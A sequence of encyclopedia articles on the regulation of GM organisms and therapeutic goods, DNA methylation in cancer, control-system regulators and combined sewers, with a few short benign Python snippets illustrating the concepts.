The U.S. regulatory policy is governed by the Coordinated Framework for Regulation of Biotechnology . [ 68 ] The policy has three tenets: "(1) U.S. policy would focus on the product of genetic modification (GM) techniques, not the process itself, (2) only regulation grounded in verifiable scientific risks would be tolerated, and (3) GM products are on a continuum with existing products and, therefore, existing statutes are sufficient to review the products." [ 69 ]
For a genetically modified organism to be approved for release in the U.S., it must be assessed under the Plant Protection Act by the Animal and Plant Health Inspection Service (APHIS) agency within the USDA [ 70 ] and may also be assessed by the FDA and the EPA, depending on the intended use of the organism. The USDA evaluates the plant's potential to become a weed, [ 70 ] the FDA reviews plants that could enter or alter the food supply, [ 71 ] and the EPA regulates genetically modified plants with pesticide properties, as well as agrochemical residues. [ 72 ]
In 2017 a proposed rule was withdrawn by APHIS after public comment. Agricultural stakeholders especially felt it would have excessively restricted genetic engineering and even new methods of conventional plant breeding . [ 73 ] [ 70 ]
The level of regulation in other countries lies in between Europe and the United States.
The Common Market for Eastern and Southern Africa (COMESA) is responsible for assessing the safety of GMOs in most of Africa, although the final decision lies with each individual country. [ 74 ]
India and China are the two largest producers of genetically modified products in Asia. [ 75 ] The Office of Agricultural Genetic Engineering Biosafety Administration (OAGEBA) is responsible for regulation in China, [ 76 ] while in India it is the Institutional Biosafety Committee (IBSC), Review Committee on Genetic Manipulation (RCGM) and Genetic Engineering Approval Committee (GEAC). [ 77 ]
Brazil and Argentina are the 2nd and 3rd largest producers of GM food. [ 78 ] In Argentina, assessment of GM products for release is provided by the National Agricultural Biotechnology Advisory Committee (environmental impact), the National Service of Health and Agrifood Quality (food safety) and the National Agribusiness Direction (effect on trade), with the final decision made by the Secretariat of Agriculture, Livestock, Fishery and Food. [ 79 ] In Brazil the National Biosafety Technical Commission is responsible for assessing environmental and food safety and prepares guidelines for transport, importation and field experiments involving GM products, while the Council of Ministers evaluates the commercial and economic issues with release. [ 79 ]
Health Canada and the Canadian Food Inspection Agency [ 80 ] are responsible for evaluating the safety and nutritional value of genetically modified foods released in Canada. [ 81 ]
License applications for the release of all genetically modified organisms in Australia are overseen by the Office of the Gene Technology Regulator , while regulation is provided by the Therapeutic Goods Administration for GM medicines or Food Standards Australia New Zealand for GM food. The individual state governments can then assess the impact of release on markets and trade and apply further legislation to control approved genetically modified products. [ 82 ] [ 83 ] The Australian Parliament relaxed the definition of GMOs in 2019 to exclude certain GMOs from GMO regulation and government oversight. [ 84 ]
In Singapore , synthetic biology products are regulated as if they were genetically modified organisms under the Biological Agents and Toxins Act . For further review see Trump 2017. [ 85 ]
In Saudi Arabia's Neom project genetically engineered agriculture is legal, encouraged, and is funded by the government as an integral part of the project. [ 86 ]
One of the key issues concerning regulators is whether GM products should be labeled. Labeling can be mandatory up to a threshold GM content level (which varies between countries) or voluntary. A study investigating voluntary labeling in South Africa found that 31% of products labeled as GMO-free had a GM content above 1.0%. [ 4 ] In Canada and the United States labeling of GM food is voluntary, [ 5 ] while in Europe all food (including processed food ) or feed which contains greater than 0.9% of approved GMOs must be labelled. [ 6 ] In the US state of Oregon , voters rejected Measure 27, which would have required labeling of all genetically modified foods. [ 91 ] Japan, Malaysia, New Zealand, and Australia require labeling so consumers can exercise choice between foods that have genetically modified, conventional or organic origins. [ 92 ]
The Cartagena Protocol sets the requirements for the international trade of GMOs between countries that are signatories to it. Any shipment containing genetically modified organisms intended for use as feed, food or for processing must be identified, and a list of the transgenic events must be available.
"Substantial equivalence" is a starting point for the safety assessment for GM foods that is widely used by national and international agencies—including the Canadian Food Inspection Agency, Japan's Ministry of Health and Welfare and the U.S. Food and Drug Administration, the United Nation's Food and Agriculture Organization, the World Health Organization and the OECD. [ 93 ]
A quote from FAO, one of the agencies that developed the concept, is useful for defining it: "Substantial equivalence embodies the concept that if a new food or food component is found to be substantially equivalent to an existing food or food component, it can be treated in the same manner with respect to safety (i.e., the food or food component can be concluded to be as safe as the conventional food or food component)". [ 94 ] The concept of substantial equivalence also recognises the fact that existing foods often contain toxic components (usually called antinutrients ) and are still able to be consumed safely—in practice there is some tolerable chemical risk taken with all foods, so a comparative method for assessing safety needs to be adopted. For instance, potatoes and tomatoes can contain toxic levels of, respectively, the alkaloids solanine and alpha-tomatine. [ 95 ] [ 96 ]
To decide if a modified product is substantially equivalent, the product is tested by the manufacturer for unexpected changes in a limited set of components such as toxins, nutrients, or allergens that are present in the unmodified food. The manufacturer's data is then assessed by a regulatory agency, such as the U.S. Food and Drug Administration . That data, along with data on the genetic modification itself and resulting proteins (or lack of protein), is submitted to regulators. If regulators determine that the submitted data show no significant difference between the modified and unmodified products, then the regulators will generally not require further food safety testing. However, if the product has no natural equivalent, or shows significant differences from the unmodified food, or for other reasons that regulators may have (for instance, if a gene produces a protein that had not been a food component before), the regulators may require that further safety testing be carried out. [ 39 ]
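The decision flow just described can be sketched roughly as follows; the component names, measured values and reference ranges are hypothetical, and a real assessment involves far more data and regulatory judgment than this simple comparison of ranges.

```python
# Sketch of the substantial-equivalence decision flow described above.
# Component names, measured values, and reference ranges are hypothetical.

def substantially_equivalent(measured, reference_ranges):
    """True if every measured component falls within the range observed
    for the conventional counterpart."""
    return all(
        reference_ranges[c][0] <= v <= reference_ranges[c][1]
        for c, v in measured.items()
    )

def assessment_outcome(measured, reference_ranges, has_natural_equivalent=True):
    # no natural equivalent, or values outside the reference range,
    # generally triggers further safety testing
    if has_natural_equivalent and substantially_equivalent(measured, reference_ranges):
        return "no further food-safety testing generally required"
    return "further safety testing may be required"

if __name__ == "__main__":
    # hypothetical composition data for a modified crop line
    reference = {"solanine_mg_per_kg": (20, 100), "protein_pct": (1.5, 2.5)}
    gm_line = {"solanine_mg_per_kg": 65, "protein_pct": 2.1}
    print(assessment_outcome(gm_line, reference))
```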
A 2003 review in Trends in Biotechnology identified seven main parts of a standard safety test: [ 97 ]
There has been discussion about applying new biochemical concepts and methods in evaluating substantial equivalence, such as metabolic profiling and protein profiling. These concepts refer, respectively, to the complete measured biochemical spectrum (total fingerprint) of compounds (metabolites) or of proteins present in a food or crop. The goal would be to compare the overall biochemical profile of a new food to that of an existing food, to see if the new food's profile falls within the range of natural variation already exhibited by existing foods or crops. However, these techniques are not yet considered sufficiently validated, and standards for applying them have not yet been developed. [ 98 ]
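The comparison step described above lends itself to a simple illustration. The sketch below assumes a toy data layout; the compound names, reference measurements, and bare min-max rule are all hypothetical, and a real profiling comparison would use many samples and proper statistics rather than a range check:

```python
# Toy profile comparison: flag compounds in a new food whose measured level
# falls outside the range of natural variation seen in reference samples.
reference_profiles = {           # levels measured in conventional samples
    "solanine":  [2.1, 3.4, 2.8, 3.0],
    "vitamin_c": [14.0, 18.5, 16.2, 15.1],
}
new_food_profile = {"solanine": 3.2, "vitamin_c": 25.0}

def flag_outliers(new_profile, references):
    """Return compounds lying outside the reference min-max range."""
    flagged = []
    for compound, level in new_profile.items():
        ref = references[compound]
        if not (min(ref) <= level <= max(ref)):
            flagged.append(compound)
    return flagged

print(flag_outliers(new_food_profile, reference_profiles))  # ['vitamin_c']
```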
Transgenic animals have genetically modified DNA. Animals differ from plants in a variety of ways—biology, life cycles, or potential environmental impacts. [ 99 ] GM plants and animals were being developed around the same time, but due to the complexity of their biology and the inefficiency of the laboratory techniques involved, their appearance on the market was delayed. [ 100 ]
There are six categories that genetically engineered (GE) animals are approved for: [ 101 ]
But see also:
Domingo, José L.; Bordonaba, Jordi Giné (2011). "A literature review on the safety assessment of genetically modified plants" (PDF) . Environment International . 37 (4): 734– 742. doi : 10.1016/j.envint.2011.01.003 . PMID 21296423 . In spite of this, the number of studies specifically focused on safety assessment of GM plants is still limited. However, it is important to remark that for the first time, a certain equilibrium in the number of research groups suggesting, on the basis of their studies, that a number of varieties of GM products (mainly maize and soybeans) are as safe and nutritious as the respective conventional non-GM plant, and those raising still serious concerns, was observed. Moreover, it is worth mentioning that most of the studies demonstrating that GM foods are as nutritional and safe as those obtained by conventional breeding, have been performed by biotechnology companies or associates, which are also responsible of commercializing these GM plants. Anyhow, this represents a notable advance in comparison with the lack of studies published in recent years in scientific journals by those companies.
Krimsky, Sheldon (2015). "An Illusory Consensus behind GMO Health Assessment" (PDF) . Science, Technology, & Human Values . 40 (6): 883– 914. doi : 10.1177/0162243915598381 . Archived from the original (PDF) on 2019-08-31. I began this article with the testimonials from respected scientists that there is literally no scientific controversy over the health effects of GMOs. My investigation into the scientific literature tells another story.
And contrast:
Panchin, Alexander Y.; Tuzhikov, Alexander I. (January 14, 2016). "Published GMO studies find no evidence of harm when corrected for multiple comparisons". Critical Reviews in Biotechnology . 37 (2): 213– 217. doi : 10.3109/07388551.2015.1130684 . ISSN 0738-8551 . PMID 26767435 . Here, we show that a number of articles some of which have strongly and negatively influenced the public opinion on GM crops and even provoked political actions, such as GMO embargo, share common flaws in the statistical evaluation of the data. Having accounted for these flaws, we conclude that the data presented in these articles does not provide any substantial evidence of GMO harm. The presented articles suggesting possible harm of GMOs received high public attention. However, despite their claims, they actually weaken the evidence for the harm and lack of substantial equivalency of studied GMOs. We emphasize that with over 1783 published articles on GMOs over the last 10 years it is expected that some of them should have reported undesired differences between GMOs and conventional crops even if no such differences exist in reality.
| https://en.wikipedia.org/wiki/Regulation_of_genetic_engineering |
The regulation of therapeutic goods , defined as drugs and therapeutic devices , varies by jurisdiction. In some countries, such as the United States, they are regulated at the national level by a single agency. In other jurisdictions they are regulated at the state level, or at both state and national levels by various bodies, as in Australia.
The role of therapeutic goods regulation is designed mainly to protect the health and safety of the population. Regulation is aimed at ensuring the safety, quality, and efficacy of the therapeutic goods which are covered under the scope of the regulation. In most jurisdictions, therapeutic goods must be registered before they are allowed to be sold. There is usually some degree of restriction on the availability of certain therapeutic goods, depending on their risk to consumers.
Modern drug regulation has historical roots in the response to the proliferation of universal antidotes which appeared in the wake of Mithridates ' death. [ 1 ] Mithridates had brought together physicians, scientists, and shamans to concoct a potion that would make him immune to poisons. Following his death, the Romans became keen on further developing the Mithridates potion's recipe. Mithridatium re-entered western society through multiple means. The first was through the Leechbook of the Bald ( Bald's Leechbook ), written somewhere between 900 and 950, which contained a formula for various remedies, including for a theriac. Additionally, theriac became a commercial good traded throughout Europe based on the works of Greek and Roman physicians. [ 2 ]
The resulting proliferation of various recipes needed to be curtailed in order to ensure that people were not passing off fake antidotes, which led to the development of government involvement and regulation. Additionally, the creation of these concoctions took on a ritualistic form and was often carried out in public, with the process observed and recorded. It was believed that if the concoction proved unsuccessful, it was due to the apothecaries' process of making them, and they could be held accountable because of the public nature of the creation. [ 2 ]
In the ninth century, many Muslim countries established an office of the hisba , which in addition to regulating compliance with Islamic principles and values took on the role of regulating other aspects of social and economic life, including the regulation of medicines. Inspectors were appointed to oversee those involved in the process of medicine creation and were given considerable leeway to ensure compliance, and punishments were stringent. [ 3 ] The first official 'act', the 'Apothecary Wares, Drugs and Stuffs' Act (also sometimes referred to as the 'Pharmacy Wares, Drugs and Stuffs' Act) was passed in 1540 by Henry VIII and set the foundation for others. Through this act, he encouraged physicians in his College of Physicians (founded by him in 1518) to appoint four people dedicated to consistently inspecting what was being sold in apothecary shops. [ 2 ] In conjunction with this first piece of legislation, there was an emergence of standard formulas for the creation of certain 'drugs' and 'antidotes' through pharmacopoeias, which first appeared in the form of a decree from Frederick II of Sicily in 1240 to use consistent and standard formulas. [ 4 ] The first modern pharmacopoeias were the Florence Pharmacopoeia published in 1498, [ 2 ] the Spanish Pharmacopoeia published in 1581 and the London Pharmacopoeia published in 1618. [ 5 ]
Various other events throughout history have demonstrated the importance of drug and medicine regulation keeping up with scientific advances. In 2006, the challenges associated with TGN 1412 highlighted the shortcomings of animal models and paved the way for further advances in regulation and development for biological products. Rofecoxib was a marketed drug whose associated risks had not been clearly communicated; its case led to the concept of 'risk management planning' within the field of regulation, introducing the need to understand how various safety concerns would be managed. Various cases over recent years have demonstrated the need for regulation to keep up with scientific advances that have implications for people's health. [ 6 ]
In the United States, regulation of drugs was originally a state right, as opposed to a federal one. But with the increase in fraudulent practices due to private incentives to maximize profits and poor enforcement of state laws, the need for stronger federal regulation increased. [ 7 ] In 1906 President Roosevelt signed the Federal Food and Drug Act (FFDA), which both established stricter national standards for drug manufacture and sales, and established the Federal government as the regulating authority over the US drug industry. [ 7 ] A 1911 Supreme Court decision, United States v. Johnson , established that misleading statements were not covered under the FFDA. This directly led to Congress passing the Sherley Amendment, which established a clearer definition of 'drug marketing requirements'. [ 7 ]
More catalysts for advances in drug regulation in the US were certain catastrophes that served as calls for the US government to step in and impose regulations that would prevent repeats of those instances. One such instance occurred in 1937, when more than a hundred people died from using elixir sulfanilamide, which had not gone through any safety testing. [ 7 ] [ 4 ] This directly led to the passing of the Federal Food, Drug, and Cosmetic Act in 1938. Another major catastrophe occurred in the late 1950s when thalidomide, which was originally sold in Germany (introduced into a virtually unregulated market) and eventually sold around the world, led to approximately 100,000 babies being born with various deformities. [ 4 ] In 1962 the United States Congress passed the Drug Amendments Act of 1962 , which required the FDA to ensure that new drugs being introduced to the market had passed certain tests and standards. [ 7 ]
The UK's Chief Medical Officer had established a group to look into the safety of drugs on the market in 1959, prior to the crisis, and was moving in the direction of addressing the problem of unregulated drugs entering the market. The crisis created a greater sense of urgency to establish safety and efficacy standards around the world. The UK started a temporary Committee on Safety of Drugs while it attempted to pass more comprehensive legislation. Though compliance and submission of drugs to the Committee on Safety of Drugs was not initially mandatory, the pharmaceutical industry later complied due to the thalidomide situation. [ citation needed ]
The European Economic Community also passed a directive in 1965 in order to impose greater efficacy standards before marketing a drug. [ 6 ] Drug legislation in both the EU and US was passed in order to assure drug safety and efficacy. Of note, increased regulations and standards for testing actually led to greater innovation in pharmaceutical research in the 1960s, despite greater preclinical and clinical standards. [ 6 ] In 1989, at the International Conference of Drug Regulatory Authorities organized by the WHO, officials from around the world discussed the necessity for streamlined processes for global drug approval. [ 4 ]
Therapeutic goods in Australia are regulated by the Therapeutic Goods Administration (TGA), which is a regulatory body of the Commonwealth Department of Health. [ 8 ] Access to medicines and poisons is regulated by the separation of substances into various schedules according to the Therapeutic Goods (Poisons Standard) Instrument; the Poisons Standard may also be cited as the Standard for the Uniform Scheduling of Medicines and Poisons (SUSMP). [ 9 ]
The Poisons Standard organises substances into 10 schedules (plus unscheduled substances); [ 10 ] therapeutic goods generally fall only into schedules 2, 3, 4 and 8:
Therapeutic goods in Brazil are regulated by the Ministry of Health of Brazil , through its Brazilian Health Regulatory Agency (Anvisa), equivalent to the US Food and Drug Administration . There are six main categories: [ citation needed ]
Biological medications are complex molecules of high molecular weight obtained from a biological source or biotechnological procedures and are divided by Anvisa into the following categories: [ 12 ]
The regulatory status of vaccines, which determines their marketing and distribution, may be one of the following established by Anvisa: [ 15 ]
Vaccines can only be administered in public health centers or authorized private vaccination services. [ 17 ]
In Canada, regulation of therapeutic goods is done by Health Canada and governed by the Food and Drug Act and associated regulations. In addition, the Controlled Drugs and Substances Act specifies additional regulatory requirements for controlled drugs and drug precursors. [ 18 ]
In Ontario , the Drug and Pharmacies Regulation Act governs "any substance that is used in the diagnosis, treatment, mitigation or prevention of a disease...in humans, animals or fowl." [ 19 ]
The regulation of drugs in China is governed by the National Medical Products Administration (NMPA) which replaced the former China Food and Drug Administration . [ citation needed ]
The regulation of drugs in Egypt is governed by the Egyptian Drug Authority (EDA).
The European Union (EU) medicines regulatory system is based on a network of around 50 regulatory authorities from the 31 EEA countries (28 EU Member States plus Iceland, Liechtenstein and Norway), the European Commission and European Medicines Agency (EMA). EMA and the Member States cooperate and share expertise in the assessment of new medicines and of new safety information. They also rely on each other for exchange of information in the regulation of medicine, for example regarding the reporting of side effects of medicines, the oversight of clinical trials, and the conduct of inspections of medicines' manufacturers and compliance with good clinical practice (GCP), good manufacturing practice (GMP), good distribution practice (GDP), and good pharmacovigilance practice (GVP). EU legislation requires that each Member State operates to the same rules and requirements regarding the authorisation and monitoring of medicines. [ 20 ]
Within the EU, EudraLex maintains the collection of rules and regulations governing medicinal products in the European Union, and the European Medicines Agency acts to regulate many of these rules and regulations. Amongst these rules and regulations are:
German law classifies drugs into
Medicines in Iceland are regulated by the Icelandic Medicines Control Agency . [ 21 ]
Medicines in India are regulated by the Central Drugs Standard Control Organization (CDSCO), under the Ministry of Health and Family Welfare and headed by the Directorate General of Health Services (India). CDSCO regulates pharmaceutical products through the Drugs Controller General of India (DCGI). [ citation needed ]
Drugs are classified under five headings. Under retail and distribution: [ citation needed ]
Under manufacturing practice:
Medicines in Indonesia are regulated by the National Agency of Drug and Food Control of Indonesia .
Drugs in Indonesia are classified into: [ 22 ] [ 23 ]
Medicines in Ireland are regulated according to the Misuse of Drugs Regulations 1988 . Controlled drugs (CDs) are divided into five categories based on their potential for misuse and therapeutic effectiveness. [ citation needed ]
The regulation of drugs in Burma is governed by the Food and Drug Administration (Burma) and Food and Drug Board of Authority . [ citation needed ]
Medicines in Norway are regulated by the Norwegian Medical Products Agency . Drugs are divided into five groups:
Narcotics, sedative-hypnotics, and amphetamines in this class require a special prescription form :
Restricted substances which easily lead to addiction, such as co-codamol , tramadol , diazepam , nitrazepam and all other benzodiazepines (with the exception of temazepam and flunitrazepam ), and phentermine .
The Food and Drug Administration regulates drugs and medical devices in the Philippines . [ citation needed ]
Prohibited. Brands and packages not actively marketed in Sri Lanka. [ citation needed ]
Medicines in Switzerland are regulated by Swissmedic . The country is not part of the European Union , and is regarded by many as one of the easiest places to conduct clinical trials on new drug compounds. [ citation needed ]
There are five categories, from A to E, covering different types of dispensing: [ 25 ]
Medicines for Human Use in the United Kingdom are regulated by the Medicines and Healthcare products Regulatory Agency (MHRA). The availability of drugs is regulated by classification by the MHRA as part of marketing authorisation of a product. [ citation needed ]
The United Kingdom has a three-tiered classification system: [ citation needed ]
Within POM, certain agents with a high abuse/addiction liability are also separately scheduled under the Misuse of Drugs Act 1971 (amended with the Misuse of Drugs Regulations 2001); and are commonly known as Controlled Drugs (CD).
Therapeutic goods in the United States are regulated by the U.S. Food and Drug Administration (FDA), which makes some drugs available over the counter (OTC) at retail outlets and others by prescription only . [ citation needed ]
The prescription or possession of some substances is controlled or prohibited by the Controlled Substances Act , under the FDA and the Drug Enforcement Administration (DEA). Some US states apply more stringent limits on the prescription of certain Schedule C-V controlled substances and on BTC (behind-the-counter) drugs such as pseudoephedrine . Three primary branches of pharmacovigilance in the U.S. include the FDA, the pharmaceutical manufacturers, and the academic/non-profit organizations (such as RADAR and Public Citizen ). [ citation needed ] | https://en.wikipedia.org/wiki/Regulation_of_therapeutic_goods |
Generally, in progression to cancer, hundreds of genes are silenced or activated. Although silencing of some genes in cancers occurs by mutation, a large proportion of carcinogenic gene silencing is a result of altered DNA methylation (see DNA methylation in cancer ). DNA methylation causing silencing in cancer typically occurs at multiple CpG sites in the CpG islands that are present in the promoters of protein coding genes.
Altered expressions of microRNAs also silence or activate many genes in progression to cancer (see microRNAs in cancer ). Altered microRNA expression occurs through hyper/hypo-methylation of CpG sites in CpG islands in promoters controlling transcription of the microRNAs .
Silencing of DNA repair genes through methylation of CpG islands in their promoters appears to be especially important in progression to cancer (see methylation of DNA repair genes in cancer ).
In humans, about 70% of promoters located near the transcription start site of a gene (proximal promoters) contain a CpG island . [ 1 ] [ 2 ] CpG islands are generally 200 to 2000 base pairs long, have a C:G base pair content >50%, and are regions of DNA in which a cytosine nucleotide followed by a guanine nucleotide (a CpG site) occurs frequently in the linear 5′ → 3′ sequence of bases. [ 3 ] [ 4 ]
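These criteria are simple enough to check programmatically. The sketch below applies the figures above (length ≥ 200 bp, C+G content > 50%) plus an observed/expected CpG ratio > 0.6, which is the commonly used Gardiner-Garden and Frommer cutoff and is an assumption not stated in this section; real annotation tools scan with sliding windows and merge overlapping hits:

```python
# Minimal CpG-island test for a single candidate sequence.
def is_cpg_island(seq: str) -> bool:
    seq = seq.upper()
    n = len(seq)
    if n < 200:                              # minimum island length
        return False
    c, g = seq.count("C"), seq.count("G")
    gc_content = (c + g) / n                 # must exceed 50%
    cpg_observed = seq.count("CG")
    cpg_expected = (c * g) / n if n else 0   # expected CpG count by chance
    obs_exp = cpg_observed / cpg_expected if cpg_expected else 0
    return gc_content > 0.5 and obs_exp > 0.6

# Toy check on a CpG-rich 300 bp sequence:
print(is_cpg_island("CG" * 150))  # True: 100% GC, obs/exp ratio of 2.0
```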
Genes may also have distant promoters (distal promoters) and these frequently contain CpG islands as well. An example is the promoter of the DNA repair gene ERCC1 , where the CpG island-containing promoter is located about 5,400 nucleotides upstream of the coding region of the ERCC1 gene. [ 5 ] CpG islands also occur frequently in promoters for functional noncoding RNAs such as microRNAs . [ 6 ]
In humans, DNA methylation occurs at the 5′ position of the pyrimidine ring of the cytosine residues within CpG sites to form 5-methylcytosines . The presence of multiple methylated CpG sites in CpG islands of promoters causes stable inhibition (silencing) of genes. [ 7 ] Silencing of transcription of a gene may be initiated by other mechanisms, but this is often followed by methylation of CpG sites in the promoter CpG island to cause the stable silencing of the gene. [ 7 ]
In cancers, loss of expression of genes occurs about 10 times more frequently by transcription silencing (caused by promoter hypermethylation of CpG islands) than by mutations. As Vogelstein et al. point out, in a colorectal cancer there are usually about 3 to 6 driver mutations and 33 to 66 hitchhiker or passenger mutations. [ 8 ] In contrast, in colon tumors compared to adjacent normal-appearing colonic mucosa, there are about 600 to 800 heavily methylated CpG islands in promoters of genes in the tumors while these CpG islands are not methylated in the adjacent mucosa. [ 9 ] [ 10 ] [ 11 ]
In one gene set enrichment analysis, 569 out of 938 gene sets were hypermethylated and 369 were hypomethylated in cancers. Hypomethylation of CpG islands in promoters results in increased transcription of the genes or gene sets affected. [ 11 ]
One study [ 12 ] listed 147 specific genes with colon cancer-associated hypermethylated promoters and 27 with hypomethylated promoters, along with the frequency with which these hyper/hypo-methylations were found in colon cancers. At least 10 of those genes had hypermethylated promoters in nearly 100% of colon cancers. The study also indicated 11 microRNAs whose promoters were hypermethylated in colon cancers at frequencies between 50% and 100% of cancers. MicroRNAs (miRNAs) are small endogenous RNAs that pair with sequences in messenger RNAs to direct post-transcriptional repression . On average, each microRNA represses or inhibits the expression of several hundred target genes. Thus, silencing of microRNAs by promoter hypermethylation may allow enhanced expression of hundreds to thousands of genes in a cancer. [ 13 ]
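The scale of that claim follows from simple arithmetic. The toy simulation below assumes illustrative numbers (a 20,000-gene genome, 11 silenced microRNAs, 300 targets each, random target assignment), none of which come from the cited study:

```python
# Back-of-envelope estimate: how many genes are de-repressed when 11
# microRNAs (each repressing ~300 random targets) are silenced at once.
import random

random.seed(0)
GENOME_SIZE = 20000                     # illustrative gene count
N_MIRNAS, TARGETS_PER_MIRNA = 11, 300   # "several hundred" targets each

derepressed = set()
for _ in range(N_MIRNAS):
    derepressed |= set(random.sample(range(GENOME_SIZE), TARGETS_PER_MIRNA))

# Roughly 3,000 unique genes despite overlapping target sets, i.e.
# "hundreds to thousands" as stated above.
print(len(derepressed))
```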
For more than 20 years, microRNAs have been known to act in the cytoplasm to repress the expression of specific target genes by degrading their messenger RNAs (see microRNA history ). However, recently, Gagnon et al. [ 14 ] showed that as many as 75% of microRNAs may be shuttled back into the nucleus of cells. Some nuclear microRNAs have been shown to mediate transcriptional gene activation or transcriptional gene inhibition. [ 15 ]
DNA repair genes are frequently repressed in cancers due to hypermethylation of CpG islands within their promoters. In head and neck squamous cell carcinomas at least 15 DNA repair genes have frequently hypermethylated promoters; these genes are XRCC1, MLH3, PMS1, RAD51B, XRCC3, RAD54B, BRCA1, SHFM1, GEN1, FANCE, FAAP20, SPRTN, SETMAR, HUS1, and PER1 . [ 16 ] About seventeen types of cancer are frequently deficient in one or more DNA repair genes due to hypermethylation of their promoters. [ 17 ] As summarized in one review article, promoter hypermethylation of the DNA repair gene MGMT occurs in 93% of bladder cancers, 88% of stomach cancers, 74% of thyroid cancers, 40%-90% of colorectal cancers and 50% of brain cancers. [ citation needed ] Promoter hypermethylation of LIG4 occurs in 82% of colorectal cancers. This review article also indicates promoter hypermethylation of NEIL1 occurs in 62% of head and neck cancers and in 42% of non-small-cell lung cancers ; promoter hypermethylation of ATM occurs in 47% of non-small-cell lung cancers ; promoter hypermethylation of MLH1 occurs in 48% of squamous cell carcinomas; and promoter hypermethylation of FANCB occurs in 46% of head and neck cancers . [ citation needed ]
On the other hand, the promoters of two genes, PARP1 and FEN1 , were hypomethylated, and these genes were over-expressed in numerous cancers. PARP1 and FEN1 are essential genes in the error-prone and mutagenic DNA repair pathway microhomology-mediated end joining . If this pathway is over-expressed, the excess mutations it causes can lead to cancer. PARP1 is over-expressed in tyrosine kinase-activated leukemias, [ 18 ] in neuroblastoma, [ 19 ] in testicular and other germ cell tumors, [ 20 ] and in Ewing's sarcoma. [ 21 ] FEN1 is over-expressed in the majority of cancers of the breast, [ 22 ] prostate, [ 23 ] stomach, [ 24 ] [ 25 ] pancreas, [ 27 ] and lung, [ 28 ] as well as in neuroblastomas. [ 26 ]
DNA damage appears to be the primary underlying cause of cancer. [ 29 ] [ 30 ] If accurate DNA repair is deficient, DNA damage tends to accumulate. Such excess DNA damage can increase mutational errors during DNA replication due to error-prone translesion synthesis . Excess DNA damage can also increase epigenetic alterations due to errors during DNA repair. Such mutations and epigenetic alterations can give rise to cancer (see malignant neoplasms ). Thus, CpG island hyper/hypo-methylation in the promoters of DNA repair genes is likely central to progression to cancer. [ 31 ] [ 32 ] | https://en.wikipedia.org/wiki/Regulation_of_transcription_in_cancer |
In automatic control , a regulator is a device which has the function of maintaining a designated characteristic. It performs the activity of managing or maintaining a range of values in a machine. The measurable property of a device is managed closely by specified conditions or a preset value, or it can be varied according to a predetermined arrangement scheme. The term can be used generally to denote any of various controls or devices for regulating or controlling items or objects.
Examples are a voltage regulator (which can be a transformer whose voltage ratio of transformation can be adjusted, or an electronic circuit that produces a defined voltage), a pressure regulator , such as a diving regulator , which maintains its output at a fixed pressure lower than its input, and a fuel regulator (which controls the supply of fuel).
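All of these devices share the same feedback idea: measure the controlled quantity, compare it with the set value, and apply a correcting action. The sketch below is a generic illustration rather than a model of any particular regulator; the plant (a first-order system with a constant loss term) and all gains are hypothetical:

```python
# Minimal proportional feedback regulator acting on a hypothetical
# first-order plant (e.g., a heater warming a space that loses heat).
SETPOINT = 20.0     # desired value (e.g., degrees C)
KP = 0.5            # proportional gain
LOSS = 0.1          # fraction of the value lost per step (disturbance)

value = 10.0
for step in range(50):
    error = SETPOINT - value           # deviation from the set value
    control = KP * error               # proportional correcting action
    value += control - LOSS * value    # plant responds; disturbance acts

print(round(value, 2))  # ~16.67: proportional-only control leaves an offset
```

Purely proportional action settles at a steady value below the setpoint; practical regulators often add integral action (as in a PI controller) to remove this steady-state offset, but the loop structure is the same whether the device is mechanical, pneumatic, or electronic.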
Regulators can be designed to control anything from gases or fluids to light or electricity. Speed can be regulated by electronic, mechanical, or electro-mechanical means. Such instances include:
| https://en.wikipedia.org/wiki/Regulator_(automatic_control) |
A combined sewer is a type of gravity sewer with a system of pipes, tunnels, pump stations etc. to transport sewage and urban runoff together to a sewage treatment plant or disposal site. This means that during rain events, the sewage gets diluted, resulting in higher flow rates at the treatment site. Uncontaminated stormwater simply dilutes sewage, but runoff may dissolve or suspend virtually anything it contacts on roofs, streets, and storage yards. [ 1 ] : 296 As rainfall travels over roofs and the ground, it may pick up various contaminants including soil particles and other sediment , heavy metals, organic compounds , animal waste, and oil and grease . Combined sewers may also receive dry weather drainage from landscape irrigation , construction dewatering , and washing buildings and sidewalks .
Combined sewers can cause serious water pollution problems during combined sewer overflow ( CSO ) events when combined sewage and surface runoff flows exceed the capacity of the sewage treatment plant, or of the maximum flow rate of the system which transmits the combined sources. In instances where exceptionally high surface runoff occurs (such as large rainstorms), the load on individual tributary branches of the sewer system may cause a back-up to a point where raw sewage flows out of input sources such as toilets, causing inhabited buildings to be flooded with a toxic sewage-runoff mixture, incurring massive financial burdens for cleanup and repair. When combined sewer systems experience these higher than normal throughputs, relief systems cause discharges containing human and industrial waste to flow into rivers, streams, or other bodies of water. Such events frequently cause both negative environmental and lifestyle consequences, including beach closures, contaminated shellfish unsafe for consumption, and contamination of drinking water sources, rendering them temporarily unsafe for drinking and requiring boiling before uses such as bathing or washing dishes. [ 2 ]
Mitigation of combined sewer overflows includes sewer separation, CSO storage, expanding sewage treatment capacity, retention basins , screening and disinfection facilities, reducing stormwater flows, green infrastructure, and real-time decision support systems .
This type of gravity sewer design is less often used nowadays when constructing new sewer systems. Modern-day sewer designs exclude surface runoff by building sanitary sewers instead, but many older cities and towns continue to operate previously constructed combined sewer systems. [ 3 ]
The earliest sewers were designed to carry street runoff away from inhabited areas and into surface waterways without treatment. Before the 19th century, it was commonplace to empty human waste receptacles, e.g., chamber pots , into town and city streets and slaughter animals in open street " shambles ". The use of draft animals such as horses and herding of livestock through city streets meant that most contained large amounts of excrement. Before the development of macadam as a paving material in the 19th century, paving systems were mostly porous, so that precipitation could soak away and not run off, and urban rooftop rainwater was often saved in rainwater tanks. Open sewers, consisting of gutters and urban streambeds, were common worldwide before the 20th century.
